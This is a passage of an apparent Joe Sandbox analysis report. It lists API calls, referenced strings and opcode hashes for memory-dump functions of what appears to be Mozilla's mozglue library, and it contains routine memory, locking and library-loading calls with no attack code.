                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3596744550-0
                                                                  • Opcode ID: b4066da119322cdafbdd808c24f6646fa7de49b61be98fa059e7042ada99f573
                                                                  • Instruction ID: 6d63a715a4b0a18f9834a7a7e1326f4c8fcc37f44fe77a8fcc350c9f7205e66f
                                                                  • Opcode Fuzzy Hash: b4066da119322cdafbdd808c24f6646fa7de49b61be98fa059e7042ada99f573
                                                                  • Instruction Fuzzy Hash: 6C3190B5A04315AFD704CF15D884A9FBBE4FF89314F10882EE85A97740DB34E919CB9A
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C64D019,?,?,?,?,?,00000000,?,6C63DA31,00100000,?), ref: 6C62FFD3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,6C64D019,?,?,?,?,?,00000000,?,6C63DA31,00100000,?,?), ref: 6C62FFF5
                                                                  • free.MOZGLUE(?,?,?,?,?,6C64D019,?,?,?,?,?,00000000,?,6C63DA31,00100000,?), ref: 6C63001B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C64D019,?,?,?,?,?,00000000,?,6C63DA31,00100000,?,?), ref: 6C63002A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 826125452-0
                                                                  • Opcode ID: 2499f692f672f45ad74d580f1adbc02340eccfff6d036e664b4d5937063e98d5
                                                                  • Instruction ID: d6468c02c52d0fc3989581185c9ab1a1b11a0183fbac8912cf3c3d790626d39a
                                                                  • Opcode Fuzzy Hash: 2499f692f672f45ad74d580f1adbc02340eccfff6d036e664b4d5937063e98d5
                                                                  • Instruction Fuzzy Hash: 7E2106B2E002215BC7189E789C848AFB7BAEB853247250338E525E7780EB719D0186DA
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C60B4F5
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C60B502
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C60B542
                                                                  • free.MOZGLUE(?), ref: 6C60B578
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: d02fddd821e10e0d252a6be5d9d322ba1e780ecb2394e11df1dff90150ac6408
                                                                  • Instruction ID: 095720ad95ab930626194cf277a4066a9c86aadb1d26f4a9baa9f6891843685c
                                                                  • Opcode Fuzzy Hash: d02fddd821e10e0d252a6be5d9d322ba1e780ecb2394e11df1dff90150ac6408
                                                                  • Instruction Fuzzy Hash: FF11E130A04B51C7D3178F2AC5447A5B3B0FFD6318F109B4AE84963A02EBB0B1D58BAD
                                                                  APIs
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C5FF20E,?), ref: 6C633DF5
                                                                  • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C5FF20E,00000000,?), ref: 6C633DFC
                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C633E06
                                                                  • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C633E0E
                                                                    • Part of subcall function 6C62CC00: GetCurrentProcess.KERNEL32(?,?,6C5F31A7), ref: 6C62CC0D
                                                                    • Part of subcall function 6C62CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C5F31A7), ref: 6C62CC16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                  • String ID:
                                                                  • API String ID: 2787204188-0
                                                                  • Opcode ID: a0b9ba8602571abcbe24a51dc04af77728d0be90074dbf3d8bbce58b4dd2addd
                                                                  • Instruction ID: edf3b4cf258d153878da459380e8cff0542ab6783994dd642fc1f5abae8afc73
                                                                  • Opcode Fuzzy Hash: a0b9ba8602571abcbe24a51dc04af77728d0be90074dbf3d8bbce58b4dd2addd
                                                                  • Instruction Fuzzy Hash: CAF05EB16002187BEB05AB55DC85DAB376CDB86624F040420FD0957740D639B9158AFF
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C64205B
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C64201B,?,?,?,?,?,?,?,6C641F8F,?,?), ref: 6C642064
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C64208E
                                                                  • free.MOZGLUE(?,?,?,00000000,?,6C64201B,?,?,?,?,?,?,?,6C641F8F,?,?), ref: 6C6420A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID:
                                                                  • API String ID: 2047719359-0
                                                                  • Opcode ID: db9dbdd9c1f7ea1525b24af34eda23e8a3f7192c6c73b5c17c4935bed2fd4c95
                                                                  • Instruction ID: ef9956c5e5fe4947df79ff37cd0b357ad836f020c1ae65d56ec1443f716e3d5f
                                                                  • Opcode Fuzzy Hash: db9dbdd9c1f7ea1525b24af34eda23e8a3f7192c6c73b5c17c4935bed2fd4c95
                                                                  • Instruction Fuzzy Hash: 63F0B471104610DBD7118F17D88875BBBF8EFC6365F10451AE50687711C771A806CBAD
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6485D3
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C648725
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 3720097785-1285458680
                                                                  • Opcode ID: fc2814dba19a6ace5f0c41e8134fe6258560d30bce6d23e24e24e8aa40387c87
                                                                  • Instruction ID: efb289a773ddb3045f267e2288c542c1b4e45aecc6d195a3a5672628783c3c39
                                                                  • Opcode Fuzzy Hash: fc2814dba19a6ace5f0c41e8134fe6258560d30bce6d23e24e24e8aa40387c87
                                                                  • Instruction Fuzzy Hash: 1E5143746006418FD741CF18C194A9ABBF1BF4A318F18C29AD8599BB62C375EC85CFDA
                                                                  APIs
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C5FBDEB
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5FBE8F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                  • String ID: 0
                                                                  • API String ID: 2811501404-4108050209
                                                                  • Opcode ID: 3d22e93eee1722e5d9a485f9c5925c105a127e81bb033fe2440c36fc684ea009
                                                                  • Instruction ID: 90322e0196f1620212f4b71b9fd9cc95a9fd02c12627d351eb4232ae41131028
                                                                  • Opcode Fuzzy Hash: 3d22e93eee1722e5d9a485f9c5925c105a127e81bb033fe2440c36fc684ea009
                                                                  • Instruction Fuzzy Hash: 1E41B271908745CFC305EF29C881A9BB7F4AF8A348F008A1DF99597611D730D94A8F92
                                                                  APIs
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C633D19
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C633D6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _errnomozalloc_abort
                                                                  • String ID: d
                                                                  • API String ID: 3471241338-2564639436
                                                                  • Opcode ID: 314ab959197f7719a43079914129071714268c1b3e0e17708b395f637ce40e06
                                                                  • Instruction ID: 03b0fb3fc22c812d460c81e0486a95f5edc683c779c149bcbeac8c3d8f5bbcf4
                                                                  • Opcode Fuzzy Hash: 314ab959197f7719a43079914129071714268c1b3e0e17708b395f637ce40e06
                                                                  • Instruction Fuzzy Hash: 15110831E046989BDB068F6AC8544EDB7B5EF86318F44B628DC4997601EB30A5C9C758
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6044B2,6C67E21C,6C67F7F8), ref: 6C60473E
                                                                  • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C60474A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetNtLoaderAPI
                                                                  • API String ID: 1646373207-1628273567
                                                                  • Opcode ID: 2dfd432c2c31fadb0f5ac0bd87b345cc957f8d54d949c9a54ae7f14d0207d74c
                                                                  • Instruction ID: 0251860e133c8cff801b7e5fa603ab64dacd565e9a992c98bcb0d873b09282dc
                                                                  • Opcode Fuzzy Hash: 2dfd432c2c31fadb0f5ac0bd87b345cc957f8d54d949c9a54ae7f14d0207d74c
                                                                  • Instruction Fuzzy Hash: DF018C753062249FDF199F668888A697BB9EB8B311F140869EA05D7300DB70D8018FBA
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C656E22
                                                                  • __Init_thread_footer.LIBCMT ref: 6C656E3F
                                                                  Strings
                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C656E1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footergetenv
                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                  • API String ID: 1472356752-1153589363
                                                                  • Opcode ID: a2d2093f8ab4a3e02e54a2ea5178750cc375d4da9e92eab97db76b0f34568fdc
                                                                  • Instruction ID: 1202d4fb06182539dcaf529e1a4e116aec731dd303cac1ec87195060fb609e8e
                                                                  • Opcode Fuzzy Hash: a2d2093f8ab4a3e02e54a2ea5178750cc375d4da9e92eab97db76b0f34568fdc
                                                                  • Instruction Fuzzy Hash: 73F0243430E240CBDB168B79CCA4EC133725B03329F540965C44546BA1DB21E527CEBF
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6C609EEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: Infinity$NaN
                                                                  • API String ID: 1385522511-4285296124
                                                                  • Opcode ID: bb2ba694f2d0904197c17811d3087ef1d4f8071cb426b4b4897a1efc21763548
                                                                  • Instruction ID: b3967efd2fa175d51e08b065c3124384a3561d0d3899b57864e19ddaaa41f5db
                                                                  • Opcode Fuzzy Hash: bb2ba694f2d0904197c17811d3087ef1d4f8071cb426b4b4897a1efc21763548
                                                                  • Instruction Fuzzy Hash: 49F08770604251CADB1A8F2ADB89F9033F2AB47319F210E19C9040AA81D3756946CAAF
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0Kcl,?,6C634B30,80000000,?,6C634AB7,?,6C5F43CF,?,6C5F42D2), ref: 6C606C42
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • moz_xmalloc.MOZGLUE(0Kcl,?,6C634B30,80000000,?,6C634AB7,?,6C5F43CF,?,6C5F42D2), ref: 6C606C58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$malloc
                                                                  • String ID: 0Kcl
                                                                  • API String ID: 1967447596-2809417867
                                                                  • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                  • Instruction ID: 2a2afc2a9ea5e9cd0dc05f59da0f7059c75adf7a470bc7f77a360659ff1cafe9
                                                                  • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                  • Instruction Fuzzy Hash: ACE086F1B505055A9B0C997C9E0A56A72C89B153A87044A35EC23E6BC8FA94E5D0816E
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F860), ref: 6C60385C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F860,?), ref: 6C603871
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                  • String ID: ,gl
                                                                  • API String ID: 17069307-2366101372
                                                                  • Opcode ID: 559b8e3496612ae5bca25d6306e510ff67095af5ff254aed5cbf236d070f8192
                                                                  • Instruction ID: 24b891d54cdff3acf1b36bdc2206a1b95d95af661d2eaad4440b49d9263eb207
                                                                  • Opcode Fuzzy Hash: 559b8e3496612ae5bca25d6306e510ff67095af5ff254aed5cbf236d070f8192
                                                                  • Instruction Fuzzy Hash: 9DE0DF31A19A289B872A9F979545D8A3BB8FE437917044C55F42927A11D730D0408AFE
                                                                  APIs
                                                                  • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C60BEE3
                                                                  • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C60BEF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$CallsDisableLoadThread
                                                                  • String ID: cryptbase.dll
                                                                  • API String ID: 4137859361-1262567842
                                                                  • Opcode ID: b5478b9462832c9bf082193f3073888290d0c568fbbd595b3ce4440e9144b27e
                                                                  • Instruction ID: bde5cf90a6e7b08173febbaa11c980b502006d19d98724cc45728873e42f9305
                                                                  • Opcode Fuzzy Hash: b5478b9462832c9bf082193f3073888290d0c568fbbd595b3ce4440e9144b27e
                                                                  • Instruction Fuzzy Hash: CBD023313C4208E7C709AB518D0DF69377497813A5F10C420F31554952C7F09413CF6C
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C64B2C9,?,00000000,?,6C64B127,?,?,?,?,?,?,?,?,?,6C64AE52), ref: 6C64B628
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(00000000,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C6490FF
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(?,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C649108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C64B2C9,?,00000000,?,6C64B127,?,?,?,?,?,?,?,?,?,6C64AE52), ref: 6C64B67D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C64B2C9,?,00000000,?,6C64B127,?,?,?,?,?,?,?,?,?,6C64AE52), ref: 6C64B708
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C64B127,?,?,?,?,?,?,?,?), ref: 6C64B74D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 8dcd24dc833db649096929021ceb599262ac5db911adf5ee92ed766146a5167d
                                                                  • Instruction ID: 639925f5e71829f1a687502708083c36fe715e52cd743d43863e141c3d1aeab9
                                                                  • Opcode Fuzzy Hash: 8dcd24dc833db649096929021ceb599262ac5db911adf5ee92ed766146a5167d
                                                                  • Instruction Fuzzy Hash: 7E51BF71A05A168FDB14CF18C9847AEB7B5FFC5308F55C52DC85AABB10DB31A804CBA9
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C63FF2A), ref: 6C64DFFD
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(00000000,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C6490FF
                                                                    • Part of subcall function 6C6490E0: free.MOZGLUE(?,00000000,00000000,?,6C64B6F6,?,?,?,?,?,6C64B127), ref: 6C649108
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C63FF2A), ref: 6C64E04A
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C63FF2A), ref: 6C64E0C0
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C63FF2A), ref: 6C64E0FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: 0017eafe5c40ac1e3266dfda4826a40f53f1df39f464279979b4579af67d7833
                                                                  • Instruction ID: df914ade6e40803085c813ff3cb4bf45ed6c4654add7276e551fa5f7c785dec8
                                                                  • Opcode Fuzzy Hash: 0017eafe5c40ac1e3266dfda4826a40f53f1df39f464279979b4579af67d7833
                                                                  • Instruction Fuzzy Hash: 7641E471604216CFEB14CF98C88035AB7B6AB45709F14C939D526DB740E732E914CBDA
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C646EAB
                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C646EFA
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C646F1E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C646F5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$freememcpy
                                                                  • String ID:
                                                                  • API String ID: 4259248891-0
                                                                  • Opcode ID: 0435e2144dcb32c2caac5c4a8d096ba227c30ca1066ce73e8d24587ca332f8ef
